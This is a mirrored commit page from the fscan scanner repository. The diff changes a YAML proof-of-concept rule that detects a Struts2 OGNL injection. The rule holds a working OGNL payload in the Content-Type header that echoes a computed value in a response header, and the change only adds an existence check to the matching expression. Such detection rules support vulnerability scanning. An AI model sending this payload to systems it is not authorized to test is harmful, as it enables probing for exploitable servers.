mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 05:01:53 +08:00
更新mod库、编码、poc等
This commit is contained in:
@@ -9,7 +9,7 @@ rules:
|
||||
Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
|
||||
follow_redirects: true
|
||||
expression: |
|
||||
response.headers["Keyvalue"].contains(string(r1 * r2))
|
||||
"Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
|
||||
detail:
|
||||
author: shadown1ng(https://github.com/shadown1ng)
|
||||
|
||||
|
||||
Reference in New Issue
Block a user